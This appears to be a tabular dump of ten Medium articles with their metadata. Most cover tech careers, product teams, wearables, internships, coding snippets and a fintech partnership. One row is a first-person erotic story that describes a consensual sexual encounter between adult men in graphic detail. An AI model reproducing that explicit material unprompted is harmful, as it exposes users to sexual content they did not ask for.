Unnamed: 0
int64 0
3k
| title
stringlengths 4
200
| text
stringlengths 21
100k
| url
stringlengths 45
535
| authors
stringlengths 2
56
| timestamp
stringlengths 19
32
| tags
stringlengths 14
131
|
---|---|---|---|---|---|---|
100 | Corgi — Undergraduate Women in Tech: Reflecting on Our 1st Year | To officially launch Corgi, we collaborated with Women Who Code Belfast and SmashFly, a local software company, to create an event featuring 3 awesome artificial intelligence talks, combined with the creative world of nail art. Attendees were encouraged to relax and paint their nails whilst listening to our AI speakers, leaving the meet-up with new knowledge, friends and a dazzling set of nails!
We asked attendees what they enjoyed about the launch — Safe to say, the feedback speaks for itself:
“The atmosphere and friendliness of all attendees and organisers”
“Love all the talks and the general atmosphere”
“Fun atmosphere”
“Everything!”
“Great talks, interesting people and not afraid to do “girly” activities while also talking tech. Also great food!”
Winter Warmer — Social Coffee Meet-up
By this stage, we somewhat established our place in NI as a meet-up group, and aimed to stay consistent with our platforms and events. 2019 concluded with our Winter Warmer; a festive community meet-up to enjoy chill chats, cosy coffee, festive food and a stroll around Belfast Christmas Market.
My cravings for those churros will have to wait until 2021, as the market won’t be open this year! 😭
#MondayMotivateHER
We created a social media campaign called #MondayMotivateHER to inspire and uplift Monday morning spirits, by featuring local and world-wide WIT, applaud them for their success and generate visibility of all the fantastic women. These are a mixture of crowd-sourced and committee written testimonials; Submit your own message of kindness to a friend or colleague here!
Here are some snippets of my favourite quotes over the past year:
Chloe McAteer: “Because of Chloe’s amazing teaching and support, I have been able to take part in AI based events and get opportunities which would not be available to me without what she provided me with. I’m so thankful for all of the educational and general support she has given me over the past year!” ~ Ceilidh Davison
Amy Gardiner: “Amy motivates me with her “can-do” attitude, her extremely positive outlook on life and her honest approaches on her work which made me feel more comfortable in my own role. She’s an extremely supportive person and is always willing to provide emotional support when I have moments of self-doubt about my abilities. Thank you Amy for always being so cheerful and motivating me to do the best I can do!” ~ Niamh Duffy
Niamh Cassidy: “I admire Niamh because of her optimism and drive to succeed. When our entire Android team was down in the dumps during one of our many 12-hour coding sessions, she was able to keep up morale and have us all ticking along with jokes and encouragement.” ~ Cameron Thompson
Lauren Taylor (FYI I almost cried when I read this): “Lauren is a natural-born leader with an ability to bring people together. She doesn’t rest and consistently seeks to improve, learn and help others. If there is an opportunity to be had, you can be rest assured she’ll go for it. I am privileged to know Lauren and she’s most definitely an inspiration to me. I have no doubt that she will go on to do great things!” ~ Raymond Dillon (Cheers, son’s crying 😭❤️)
COVID Disruptions
After working our way through the lull that is January exams, we had 3 exciting events in the works — Until we didn’t.
Similar to everyone else on the planet, Covid-19 struck and all our plans were put on pause. After a few months of uncertainty, it became clear this was not going to be a short-lived period. To overcome this, we pivoted to online events, and went ahead with our first event, Careers in Tech!
Careers in Tech
This was a collaboration with Women Who Code Belfast, featuring a panel of 5 inspiring women in the industry, highlighting the different disciplines available, regardless of your background. This included a Software Engineer, Games Producer, Senior Venture Designer, Data Science Research Associate and Product Manager.
Despite the disruptions, the event went down brilliantly with the community:
“I can honestly say this evening’s event was one of my favourite events to date — our panel of speakers were all so insightful, inspiring, and wholesome. There were so many great nuggets of wisdom” ~ Mary-Jane
The New Academic Year — Freshers’ 2020
To pop-off the new academic year with a bang, we teamed up with Kainos for our Freshers campaign. This involved a Freshers Quiz (who doesn’t want £100 worth of Amazon vouchers to replace those scratched up pots and pans?), alongside a social media competition to win a stunning pink and white mechanical keyboard and mouse worth £140 (WFH setup goals).
As the weeks of social distancing and lockdowns dragged on, we realised how much we valued social contact with each other. It made me think about how I felt being on my own in London, and the importance of having that sense of community. Alas, we decided to bring the community online, and created a Discord server where anyone can hop in, chat, share resources and play impromptu games of Among Us!
Join our Discord here! ✨
Corgi Committee Applications Now Open!
That’s all of Corgi’s events up until today! We’re growing strong, and hope to continue hosting events over the next year to bring people together and provide a fun support network.
If you resonate with the Corgi community, want to inspire others, organise events, learn new skills in communication, planning and teamwork and network with local leaders and companies — Apply to be on our committee!
I’ve had an incredibly rewarding time building Corgi from the ground up, and I’ll be sad to say goodbye as I graduate into the working world. That said, I’m super proud of the women behind the 2020/21 committee, and their ability to adapt and lead the community towards bigger and better opportunities! I would have loved to join Corgi as a nervous undergraduate first year, so I’m super grateful knowing it’s fallen into good hands and has a promising future, that’ll only bring more joy into more people’s lives, and provide students with the sense of belonging and support they deserve!
Applications close: Monday 2nd Nov, Midnight.
Please share this post with anyone you think would enjoy being on this years committee! Lastly — Thank you for reading ❤️
Corgi Platforms | https://medium.com/@laurentaylor1/corgi-undergraduate-women-in-tech-reflecting-on-our-1st-year-84211c140227 | ['Lauren Taylor'] | 2020-10-26 22:08:10.965000+00:00 | ['Community Development', 'Students', 'Women In Tech', 'Diversity In Tech', 'Technology'] |
101 | Building Great Product Teams: Notes From the Underground | Building Great Product Teams: Notes From the Underground
Great product teams make great products. They’re not your average teams.
I’ve been a part of phenomenal teams and I’ve been a part of teams that have had many, many opportunities. I’ve been on teams navigating a now failed startup, on ones jet-setting and consulting globally for high profile clients (hello late-night coffee journeys in Zurich!), and most recently, on ones embedded within a very large organization.
I’ll start with the obvious and non-bleeding edge: a team and its products is a mini-ecosystem. (I swear, it gets better than this.)
One of my favorite human-made ecosystems 👏🏽
This doesn’t mean there are A players and B players, and we certainly shouldn’t subscribe to the idea that there can’t be many star players on a team, it’s outside of that framework. No one is starting and no one is benched. What this means is that everyone has a wealth of skillsets they bring to the team to bring something to life. And they’re all interconnected. The most high-level way we start to do this is the concept of roles. Someone codes, someones tests, someone user researches, someone designs, someone story-tells, and so on. It’s an easy way to create a team formula. And it’s not a bad start. It’s digestible, actionable, and most of the tech industry is ok with it. Because it works well, to an extent.
But the foundational aspect here is it simply creates a product team, a working, functional team — not necessarily a great team.
Great product teams are built with grit. It definitely starts with the individuals, and includes both role-based skills and other skills, but there are qualities at the team level we should be nurturing.
Note 1: a great product team has a goal
Whatever color Kool-Aid or level of fidelity this may be, it has to exist. And you have to all be there for it.
Some of the best teams I’ve been on have had the clearest goals, whether it’s — and here are some fuzzy examples — to get something to market in the next eight weeks, to improve best product practices for a client, to move to continuous delivery, to increase conversion by 4%, and so on. This doesn’t mean everyone won’t have their own goals, and I think it’s healthy and necessary everyone does because these are shorter-term motivators and bring us additional joy and satisfaction in our work. Maybe someone wants to learn a new and emerging language or testing framework, or someone else wants to improve their storytelling or public speaking. All ok. But the thread that ties everyone together to make a group of people a team, is the overarching goal.
Designed by Lillen.
And what makes a great product team in this regard, is that the “great” differentiator can start to emerge when everyone on the team is actually bought into the same goal. Otherwise it’s just a group of people working on a set of features perhaps peripherally related to a slide someone presented in a leadership meeting awhile ago.
Note 2: a great product team is empowered
The team holistically has the skillsets, accountability, ownership, and tools or means to achieve their goal. Often with lots of creativity.
On all product teams, teams build features and own getting a solution out into production. Check. Not writing home about this.
On great product teams, teams own the problems, the prioritization of those problems, and the solution. Which means they’re empowered to 1) choose which problems to solve, and 2) solve the problems however they want to.
This gives rise to a few valuable non-role specific skillsets to look out for when building a great product team. I’ve personally found that high levels of curiosity, ability to effectively navigate ambiguity, ability to make decisions without all the information, and an understanding of short and long-term tradeoffs are some of the most critical ones to help a team thrive and become empowered. (Let’s assume an organization has not already disempowered a product team; this is really another discussion on product leadership.)
When building out my own teams, a common interview question I will almost always ask is some form of “What are you most excited to learn or take on in the next year that you don’t know how to do now?” Occasionally you get a downer response of “oh, putting into practice what I’ve learned…” But if you’re wanting to build a great product team, this response won’t cut it. One of the best hires I’ve ever made, her face lit up when I asked her this question. She rattled off a list of all things she wanted to do that she hasn’t done yet and what she wants to learn and where she wants to go. The light was fully on. And that indicates to me two distinct qualities: that she is curious as hell, and that she has a solid understanding of what she knows and what she doesn’t and where that universe of growth is waiting for her. It’s one of the most exciting things to see when building a great product team.
People with these qualities drive a team to shift from simply delivering to delivering the right thing. And that’s a requirement of great product teams.
Note 3: a great product team embodies a set of *desirable* values
Values exist, and everyone on the team shares them. And they use those values to achieve their goal given they are empowered to do so, in a way that feels right to them.
A product team’s values could be transparency, integrity, collaboration, bringing your authentic self to work and allowing others to do the same, challenging ideas and not people, and so much more. We may all have different ways of manifesting these but our values need to be aligned. Granted you can have teams that share somewhat undesirable values, but let’s assume we’re shooting for the stars here.
I’ve really found this to be team-critical, and another huge differentiator between an average team and a great product team. Fluffy as it may be, IMO shared values is the most important thing in building great product teams. A difference in values is a complete crack in the boat. Think about your own team: Does someone value predictability? Moving up the company ladder? Calling out when the team isn’t building the right thing? Always being right? Taking time to upskill someone else on the team? What does the team value as a whole? All these values and manifestations of values create culture. The culture we nurture by doing, the culture we allow to thrive by not doing. (If this is not clear from oh, let’s say life, then yes, inaction has an impact just like action.) Thus, everyone owns their own culture-add.
I’ve been a part of teams that have shared values and it’s been unstoppable. (You know who you are!) I’ve also been a part of teams that did not share a set of desired values and wow, what a showstopper. Talk about non-thriving. The teams were empowered to… barely keep our heads above water.
We need to value creating a safe space for everyone to challenge everything (let the best idea win!), and to allow people to bring their full, authentic selves to the team.
When you’re looking to build a great product team, focus on the values a person brings and how it will affect the overall set of values the team embodies. Skill sets can be complementary but values should be aligned. Given a desirable set of values, it could even move beyond a great team to ensure your team is built in a way that it will continue to grow and the products will grow with it. Instead of reinforcing the same norms and predictable feedback loops through an outdated culture-fit, teams anchored in shared values will be able to grow and produce a few years from now in a way they never even imagined was possible today. And that’s exciting. These mini ecosystems of teams are breathing, growing things.
And to wrap it up, team values was described to me the other day by a partner at a VC firm, as “enough of both collaboration and contradiction to make a pearl.” Brilliant.
Thanks for reading. | https://medium.com/swlh/building-great-product-teams-notes-from-the-underground-152ff6aeddc7 | ['Lauren Barrett'] | 2020-12-16 21:54:49.128000+00:00 | ['Technology', 'Startup', 'Software Development', 'Product Management', 'Teamwork'] |
102 | When it comes to engagement, nothing beats videos and live-streams. | When it comes to engagement, nothing beats videos and live-streams.
When I was done with a 4-hour Live-Stream this morning, I was pumped. The viewership and real-time engagement were the highest I encountered in 2020.
Photo by Nathan Dumlao on Unsplash.
The 4-hour Live-Stream was split into “Yesterday”/“Today”/”Tomorrow” to commemorate our 2020 journey.
I shot a video while performing backstage support for the segment on “Tomorrow”, explaining how backstage works to the YouTube audience.
I will be contributing one story to Technology Hits on “How To Live-Stream” (Tentative title!). For now, please enjoy the YouTube video and the story on the videos attached! | https://medium.com/technology-hits/when-it-comes-to-engagement-nothing-beats-videos-and-live-streams-f5aaa8c57a04 | ['Aldric Chen'] | 2020-12-17 11:15:43.193000+00:00 | ['Digital Marketing', 'Engagement', 'Videos', 'Livestream', 'Technology'] |
103 | diconium Talks Futures: How we can shape our future today | New technologies emerge so fast that it becomes harder to predict what our future will look like. That’s why we explored possible features along with our guest at the 25 year anniversary of diconium. Our guest list included Pascal Finette, Joana Breidenbach, Dame Stephanie Shirley and many more.
The Hype Cycle for Emerging Technologies by Gartner is one of the most prominent examples of future prediction. It shows the life stages of certain technologies and starts at conception until its way to widespread adoption. Such graphics offer a great overview, but they lack complexity. The future doesn’t just happen, it’s something we can actively shape and need to discuss in order to understand all dimensions.
At our 25-year anniversary, we tried exactly that. At Diconium talks futures we covered three main topics: mobility, e-commerce, and sustainability to look into the implications and possible scenarios for our future. Those topics are not only driving topics of our time but also interconnected as we explored during the sessions. We invited more than ten bright minds to join us celebrating and to share their beliefs, hopes and predictions for the future with us.
We also recorded one episode of our podcast REWRITE TECH to collect the highlights of the three-day event along with our hosts Geraldine de Bastion and Brad Richards.
How can we keep pace with the new challenges of mobility?
The first automobile was invented more than 100 years ago and relatively quickly cars became widely accessible. Today cars are omnipresent in almost every part of the world, but we’re in the midst of a paradigm shift. With the introduction of software into cars, the mobility landscape will drastically change and needs to redefine itself.
One of our first guests covering these topics was Christoph Hartung, Executive Vice President at Bosch Connected Mobility Solutions. He talked about how software will change how cars work and the increasing complexity. We’re still at a point, where the industry needs to learn how to deal with those new challenges as he outlines.
“A really trick part, that will challenge us in the future, is cybersecurity.” — Prof. Dr. Michael Resch
Adding to that, Prof. Dr. Michael Resch, DirectorHigh-Performance Computing Center, highlighted that the development of connected services requires a deeper understanding of cybersecurity. He elaborated on an example of remote flying and why such ideas are quickly discarded.
How can we innovate in the future?
When diconium started 25 years ago, among the first clients were Neckermann and Quelle, two German catalogue mail-order companies. Since then, retail has massively evolved. Nowadays, diconium builds complex webshops and the industry talks about things like contextual commerce.
But what is the next step for commerce? Being innovative is essential when you want to stay in business. It means that you must see business opportunities before your competitors do. According to Pascal Finette, co-founder of be radical consultancy, the key to that is to identify weak signals, which are the early parts of exponential growth as he explains during his session. When companies learn how to detect and understand those early signs, they are able to thrive.
“One of the major differentiations I make in the innovation field is between bullshit innovations and innovations that are meaningful. Bullshit innovations harm our society or environment or they don’t add anything new significantly.” — Joana Breidenbach
Still, companies shouldn’t innovate for the sake of innovation, says Joana Breidenbach, who is the co-founder of betterplace.org. She calls out “bullshit innovation” as meaningless strategies, but also gives concrete tips on how teams need to develop in order to make a real difference in the world.
How can we integrate sustainability as a core principle?
Innovation and future-building become even more complicated when we put sustainability into the mix. Building environmental-friendly solutions should be at the core of our work. We certainly need innovative ideas, but they shouldn’t be too innovative, argues Matthew Manos, who owns the design strategy practice verynice. People need to get used to new developments and sometimes middle ground innovations help. One good example are hybrid vehicles, which pave the way for electric mobility.
“If you wanna envision and realise a more sustainable future, don’t be too innovative” — Matthew Manos.
We had so many more great guests on our stage, that it becomes hard to pick a favourite. We summed up some of the most interesting statements our guests made in our podcast REWRITE TECH. You can find it on all major listening platforms including Apple Podcasts and Spotify.
You can also still request the recording of the three-day event on the diconium website.
________________________________________________________________
Learn more about REWRITE TECH. | https://medium.com/rewrite-tech/diconium-talks-futures-how-we-can-shape-our-future-today-814848168b19 | ['Sarah Schulze Darup'] | 2020-11-23 15:53:46.878000+00:00 | ['Events', 'Future', 'Technology', 'Podcast', 'Futurology'] |
104 | How A Small Device Can Help Monitor and Reduce Stress | Occupational stress and burnout are major issues that our society faces today. One up and coming intervention for this stress comes in the form of new technology. The past decade brought a surge in companies that develop wearable technology to help improve consumer health. This includes increasing accessibility to devices that help users better manage their stress.
There is a lot of value in having a good, widespread way to evaluate the experience of stress. Understanding when you are experiencing stress allows a more precise determination of the stress’s cause.
One concept that is widely used in the devices to help consumers reduce their stress is biofeedback. Biofeedback describes the process by which you can impact your biological outputs, like respiratory effort and heart rate variability. Wearing a health monitoring device (like an Apple Watch) allows the user to be more in tune with their biological outputs. This knowledge, in combination with techniques taught for stress management, allows the user to reduce their physiological stress reaction in real-time. Biofeedback is discussed in much more detail in another article on our blog, “A Biofeedback Hack: Controlling Stress through Resonant Breathing” by Johanna Bergstrom. Here you can find more information about incorporating this technique as a stress management technique in your life.
Devices that Track Respiratory Effort
One physiological measure that is computable by wearable health devices is respiratory effort. This includes measures of the number of breaths taken per minute. It is a cool area for intervention with biofeedback because breathing can be voluntary. This voluntary action allows for direct intervention.
A recent study done by Stanford University used a new wearable technology from Spire Health to track stress. This study uses the Spire Stone device and its accompanying application to track respiratory effort as a measure of stress.¹ The experimental protocol for the experiment included different aspects of wearing a device. These different facets of wearing the device helped reduce the negative impacts of stress. The researchers discussed the significance of wearing the device as a reminder of the stress reduction program as well as the motivation of having readily available biofeedback information. There was also a mindfulness stress reduction program incorporated in the application associated with the device.²
The findings of the study were significant. Participants using the device for four weeks reported experiencing less negative impacts of stress and less stress-related symptoms.³ They also reported fewer days where they felt stressed or anxious when compared with a group that did not complete the same stress management program.⁴
Illustration by Nadia Mokadem
Devices that Track Heart Rate Variability
Technologies that measure heart rate variability are also viable options for wearable technologies that can monitor stress. Heart rate variability is a measure of the variation of time between heartbeats.⁵ It is a non-invasive technique for measuring physiological responses associated with stress.⁶ Its use and value as a clinical marker are discussed in detail in an earlier post on our blog. For more information on heart rate variability, “Why You Need to Measure Heart Rate Variability?” by Johanna Bergstrom is a great resource.
Recent studies demonstrate the value of heart rate variability, especially as a tool to monitor and reduce reported stress levels.⁷ These studies discuss how the understanding of your heart rate variability from wearable health devices in combination with biofeedback techniques can help reduce the levels of stress experienced.
One study tested heart rate variability against other physiological markers of stress. These researchers found that it is a promising tool that can be easily measured by a wide variety of wearable devices readily available to consumers.⁸ A particularly interesting finding is the difference in the reported stress level of the participants and the measured stress level. Researchers studying the use of heart rate variability as a marker of stress found that participants reported lower levels of stress than their heart rate variability monitoring suggested.⁹ One possible implication of this finding is that people are not in touch with the level of stress that their body is experiencing.¹⁰
There are many tangible incentives for employers to start implementing these devices as tools to help their employees better manage their stress levels. Research suggests that occupational stress and burnout contribute to between 5–8% of the annual spending on healthcare in the United States.¹¹ It also discusses how the negative aspects of stress on employee productivity could be costing businesses enormous amounts of revenue each year.¹² Helping employees to reduce their stress by implementing stress management programs would be overall beneficial to all involved parties. Research even suggests these programs can help to decrease absences and increase employee productivity.
Many wearable health devices are available on the market, in a wide price range, for consumers to purchase. There is one out there for you if you are interested in trying a stress management program with the biofeedback from a wearable health device.
References | https://medium.com/x-factors-in-life/how-a-small-device-can-help-monitor-and-reduce-stress-f00736cca56c | ['Emilia Lambert'] | 2020-12-03 21:17:47.374000+00:00 | ['Stress', 'Biofeedback', 'Technology', 'Burnout'] |
105 | 10 Remote 2021/2022 Data Science Internships You Should Apply to If You’re a Student | 10 Remote 2021/2022 Data Science Internships You Should Apply to If You’re a Student
Photo by Sung Shin on Unsplash
As a student, who has been in school almost my entire life, I always felt that the knowledge we learn in school is theoretical. That feeling only grew whenever I talked to my friends and colleagues who worked in the industry or had some experiences outside the university. This gap between what we learn in our degrees and what we actually need to succeed and build a career is one of the reasons internships are necessary for any student.
Although internships are important for basically any student regardless of their major, it’s even more important if you’re a student in a tech field. In tech, we study the history of a field, the tools we can use, and some field applications. But, university classes are never enough to build a real-life experience that will help you launch a career once you graduate.
Here, internships make a difference, not just helping students gain experience and know what to expect when they get a job after graduation. Still, it also helps them decide what career they want to pursue after obtaining their degree. So, if you’re a student, undergrad or post-grad, trying to get an internship, it will definitely change the way you view your field and help you get a job later.
In September of every year, companies worldwide open up the applications for the following year’s summer. So, today, I will walk you through 10 remote internship opportunities for the 2021 fall or 2022 summer that you can apply for now.
№1: Quora Software Engineer — Machine Learning Intern 2022
First on our list is a machine learning internship offered by Quora. In this internship, you will be working on improving Quora’s existing machine learning systems, improving the user experience, and working with other machine learning engineers to implement different algorithms and systems efficiently. To apply for this internship, you need to be a student who knows the basics of machine learning and experience with Python or C++.
№2: Moyyn Machine learning | AI Internship
Next up is a 3 or 6 months machine learning and AI internship offered by Moyyn. Moyyn is a recruitment platform based in Germany that focuses on automating the matchmaking of candidates and companies. This internship will have you working on the algorithm of the platform as well as test the algorithm and optimize it. To apply for this internship, you need to be a student and know NLP, machine learning, and AI basics.
№3: IBM Data Science and Engineering Internship
Next up is a data science internship offered by IBM. This remote opportunity is available for students across Europe or the US, with the chance for international applicants. To apply for this internship, you need to have intermediate Python skills and knowledge of NLP, have a solid foundation of data structures, and be fluent in English.
№4: Woohoo Machine Learning Internship
Woohoo in Singapore offers this remote internship for students with
MS in computer science, knowledge of distributed systems, and software engineering. You also need to have experience building, maintaining, and extending web-scale production systems and know-how to perform AB testing and machine learning algorithms.
№5: Workiva Data Science Internship
Workiva offers a remote internship to anyone residing in the US or has a work permit in the US. During this internship, you will participate in discovery, gathering, and exploratory data analysis and help the machine learning engineers design, develop, and optimize their data pipelines and test large-scale models.
№6: HackerRank Software Engineer Internship
Next up is s remote internship from HackerRank if you reside in India. If you love to write code and connect with other developers and engineers worldwide, then this is the internship for you. To apply for this internship, you will need to solve 3 test challenges and submit your resume; that is it.
№7: Snackpass Data Science Internship
Snackpass, an ordering and dine-in app based in the US, offers this remote internship where you can help answer important business questions for promoting restaurants. Design and build machine learning models for hundreds of users, test and optimize these models for different use cases.
№8: 1Qbit Machine Learning Researcher Internship
If you’re into machine learning and curious about quantum computing, then this internship by 1QBit is ideal for you. This 8 months remote internship will allow you to utilize your machine learning background to address challenging industry problems on both quantum and classical sides and leverage your knowledge to develop new tools and computing capabilities.
№9: Shopify Data Science Internship
Shopify is making opening your own private business as easy as buying a product online. Shopify offers an internship where you can build machine learning models that enhances Shopify’s intelligence and help people make better decisions about their business. You will also get the chance to contribute to the open-source community and make lasting connections.
№10: VidMob Data Science/ ML Internship
Next up is a data science and machine learning internship by VidMob, where you can apply your expertise in quantitative analysis, machine learning, and data visualization to real-life problems. You can also analyze the results of different models to understand their performance better and improve it further.
Takeaways
No matter what degree you go to school for, there is always a gap between what we learn in the university and what we will actually do after we graduate and start looking for jobs. Not just that, but often, after we graduate and start going through the job-hunting nightmare — you better start if before you graduate, though — we realize that we don’t even have the experience needed for an entire level position.
Thankfully, we can gain the experience we need and make some money in the process by trying to obtain an internship in a company. Often most companies open up chances for internships during the summer vacation, and applying for these internships opens during the fall of the year before. So, basically, now is the ideal time to start looking and applying for next year’s summer internships.
Since covid hit, all aspects of our lives got disturbed, including the chances to apply for internships abroad. However, because of that, many companies are now allowing the chance for remote internships, with the possibility to make it in-person if things get a little better before next summer.
In this article, I proposed 10 internships for this fall or next summer that you can apply for today to gain the experience you need to land the job you want after you graduate. Good luck… | https://towardsdatascience.com/10-remote-2021-2022-data-science-internships-you-should-apply-to-if-youre-a-student-b2c4e3c9ad6d | ['Sara A. Metwalli'] | 2021-09-12 16:56:40.778000+00:00 | ['Women In Tech', 'Students', 'Data Science', 'Careers', 'Technology'] |
106 | Mathematics for Machine Learning | Mathematics for Machine Learning
An online book that provides foundational knowledge about the mathematics behind machine learning concepts.
A new online resource appeared this week which gained much attention on Twitter. Just take a look at the engagement below:
Not everyday a resource like this comes by, actually this project, according to the authors, took roughly two years to complete. I thought it was a good idea to share it with our community. This will be archived under the “Learn” tab of this publication, which is intended to highlight useful educational resources and material to learn about concepts related to machine learning, artificial intelligence, natural language processing, and deep learning.
The resource I am referring to is the online book called “Mathematics for Machine Learning” by Marc Peter Deisenroth, A Aldo Faisal, and Cheng Soon Ong. I share this book here because it’s free and it contains a great introduction to the mathematics behind some of the most pervasive machine learning techniques. Some concepts include Analytic Geometry, Vector Calculus, and Continuous Optimization, among others. The summarized table of contents looks as follows:
If you ever need a place to start learning about the maths behind machine learning, then this a highly recommended book.
Besides the book itself, the open project also provides easy to follow python notebooks that include code walkthrough of concepts like Maximum Likelihood and PCA, which are all important techniques in machine learning. | https://medium.com/dair-ai/mathematics-for-machine-learning-bbbaa5fb1c06 | [] | 2019-08-23 17:42:15.456000+00:00 | ['Machine Learning', 'Technology', 'Artificial Intelligence', 'Data Science', 'Deep Learning'] |
107 | How to speed up your Competitive Programming? | Snippets
Doing a Breadth-First Search on a tree and executing in less than 25 seconds
If you don’t know what snippets are then, “Snippet is a programming term for a small region of Re-Usable Source Code,” and a lot of modern text editors like Sublime provide you a functionality to automatically write a predefined snippet by just writing a keyword.
I cannot emphasize enough on how much I think, and one can speed up their implementation by using Snippets. So whether you need to do a Breadth-First or Depth-first Search or need to use Segment Tree or want to do Matrix Exponentiation, you are just a (Keyword+Tab) away from its code.
It will not only improve your speed but, in turn, allow you to quickly try multiple approaches and switch between them whenever necessary without losing much time.
How to Add a Snippet
Adding a snippet in Sublime Text is pretty straightforward. Just navigate to Tools>Developers>New Snippet.
Base Template for Starting a Snippet
Use this as your base template for a snippet and paste the code that you want to use in your Snippet by replacing the comment and trigger Keyword.
Example: A Completed Snippet of a Fenwick Tree
I like to use Snippets a lot and the hardest part is to use them is to make them before you need them. So to ease things for you, I have created a Github Repository with some of my most-used snippets and relevant instructions. Feel free to use them and consider contributing. | https://medium.com/coding-blocks/how-to-accelerate-your-competitive-programming-6d9c163e2e06 | [] | 2020-03-14 02:36:48.321000+00:00 | ['Programming', 'Technology', 'Competitive Programming', 'Interview', 'Software Development'] |
108 | In Bed with a Hard-Bodied Tech Bro | His kink was new to me
In Bed with a Hard-Bodied Tech Bro
He was almost forty years younger
Photo by Allef Vinicius on Unsplash
I’ve been shocked to find how many men in their twenties and thirties think it’s cool to hook up with a guy in his sixties. Being able to look at and being given permission to touch their bodies is more electric for me now than it was when I was their age. My hand on their flat bellies shocks me into relishing the future.
So last year I met a new guy via an online app. He’s 27 years old and was born in Beijing. He has a job in information technology. He travels a lot for work. He’s shorter than me. He has a hard body from running along the river in the town where we both live. He has this kink. He wants an older guy to wear dress socks and dress shoes and nothing else. He made that a condition of our meeting up. I’d never encountered this before and found it a little funny, but whatever it took to be with a hot 27-year-old runner was okay with me.
He came over to my place. I could see him getting out of his ride share down in the street. Open-faced and a little nerdy looking. A tech bro. Very friendly in person. We shook hands and smiled at one another. I gave him a tour of my apartment.
He was over-anxious about our being discovered. He wanted all the shades down and to be reassured that no one would hear us. He wanted tape over the computer camera. He checked and re-checked this. I wondered whether this had anything to do with growing up in China where the state has large powers of surveillance. Or, maybe he just wanted to make sure I wasn’t filming him?
We sat on the sofa and had a short conversation about our lives and work. I asked him if I could kiss him. He agreed. Soon, while we were fully clothed, I got him lying flat and climbed on top of him. He whimpered. I knew then that he liked my weight pressing him down.
After a while, I asked him to get up and strip for me while I continued sitting on the sofa. He liked the command. I’m not used to ordering people around, but I had an instinct about him. He took the order docilely. I was still fully clothed. I was wearing the dress shoes and socks he wanted. He crossed the room and pulled off his tee shirt. Then he stepped out of his running shorts. There was a big wet spot from pre-cum on his black undershorts. He shucked these off to reveal a full hard-on and dark pubic hair. If that wasn’t a moment of glory, I don’t know what is.
Next, I commanded him to come and straddle my knees and thighs, facing me. I stroked his dick while he faced toward me, watching me. We kissed occasionally. His wet cock bobbed in the space between us. It was fantastic. It made me feel giddy.
We ended up on the bed in my bedroom, him fully nude, me naked except for the dress shoes and the socks. We jerked each other on our backs. We tried belly to belly and rubbing our dicks together.
When I put a finger on top of his asshole and tapped it a little, he was uncomfortable. I knew from his earlier whimper he would probably like it. But some extreme caution on his part re-asserted itself. I continued tapping him a few times. He scooted away and told me to stop. Then he relented. He asked me to put a condom on my finger before sliding it with some lube up his bottom.
He loved this. His voice went from a gentle tenor to a deep bass. He made inarticulate noises that could’ve been a nightmare if I hadn’t been so sure they were pleasure. He spread his legs and opened wide. He gave me everything he had. I kissed him then and, though we didn’t know each other, I had a profound feeling of being for a moment one with him. My lips were on his, our tongues intertwined. My finger was deep in his ass and he was groaning. It was as if we were speaking to each other without words. It was what human life is all about. It was what we were meant to do.
He ended up by coming when I put my feet in socks on his penis and rubbing him there. He clasped my feet together with his hands so he could get friction in the right places. He came all over my socks, which were a sticky mess. It was a turn-on to watch him do it.
He then lay patiently by my side and waited for me to come. He didn’t mind my playing with his soft dick while I was doing it. His dick hard was a respectable five or six inches. Soft it was no bigger than a schoolboy’s. I thought he’d be totally worn out and ready to go by the time I came (really it probably only took about 20 minutes). No, when I was done, he decided to go again himself and came a second time (in about 5 minutes).
When he got dressed to go, he asked whether he’d done everything I wanted. Had he been taught at work to go through an evaluation with the client after every time he’d given a presentation? Was it what I expected? How could it be improved? I said it was wonderful and nothing could have been better. I thanked him. He didn’t mind my taking one last quick feel of his hard stomach. He didn’t mind my putting my hand in between his legs, where I felt him start to get hard all over again. He called his ride share on his cellphone and he was off. I did see him one more time.
His subservience was what surprised me the most. I’ve always felt that equality was a necessary ingredient of good sex, but this young Chinese guy’s willingness to please me, his obedience, was a newer, and stranger turn-on than the difference in our ages. I found myself looking forward to the next time I could spread his legs. He would avert his eyes, put his arm up to shield his face, as if he were embarrassed at the control he wanted me to have over him.
That first time I watched his ride share pull away from the curb, he looked up at me looking down at him from an upper window. From behind his dark-rimmed glasses, he gave me a goofy smile. I wasn’t sure because the car was pulling away, but I think he winked at me. | https://medium.com/sexual-tendencies/socks-shoes-turned-him-on-b112fb56900b | [] | 2020-07-01 22:28:31.001000+00:00 | ['This Happened To Me', 'Sexuality', 'True Story', 'LGBTQ', 'Technology'] |
109 | ZeroBank signs a Strategic Partnership with Bac A Money Transfer — a subsidiary of Bac A Bank | We are excited to announce our partnership with Bac A Money Transfer on 12th June 2018. At the Memorandum of Understanding (MOU) session, there are top panel members from Bac A Money Transfer, including Mr. Le Ngoc Hong Nhat — Deputy General Director of Bac A Bank, member of Board of Directors Bac A Money Transfer;Mr. Chu Nguyen Binh — Deputy General Director of Bac A Bank and Mr. Chau Vinh Huy — Deputy Director of Bac A Money Transfer.
Under our partnership agreement, ZeroBank will be developing a non-commercial international money transfer application in iOS and Android operating systems, utilizing blockchain and smart contract technologies. Meanwhile, Bac A Money Transfer will be taking charge of testing and providing feedback for ZeroBank application and help improve our service. By joining partnership with Bac A Money Transfer, we will have the quality and functions of ZeroBank application optimized.
The signing of the agreement with Bac A Money Transfer shows our determination to achieve our goal in providing a world-changing money exchange and transfer service to solve the current problems within the cross-border money exchange industry.
Speaking about ZeroBank project, Mr. Chau Vinh Huy — Deputy Director of Bac A Money Transfer shared with us: “Applying blockchain technology in finance and banking industry is an indispensable trend across the globe and Vietnam is no exception to this trend. The application of blockchain technology can help cutting the cost effectively and improving security for banking system. Bac A Money Transfer is glad to cooperate with ZeroBank which is built and run by an expert team who are holding strategic positions at world-class finance and banking organizations as well as having extensive experience in IT banking. Our partnership will benefit both parties in finding the solutions to improve our service quality.”
Mr Chau Vinh Huy- Deputy Director of Bac A Money Transfer is speaking about the partnership with ZeroBank
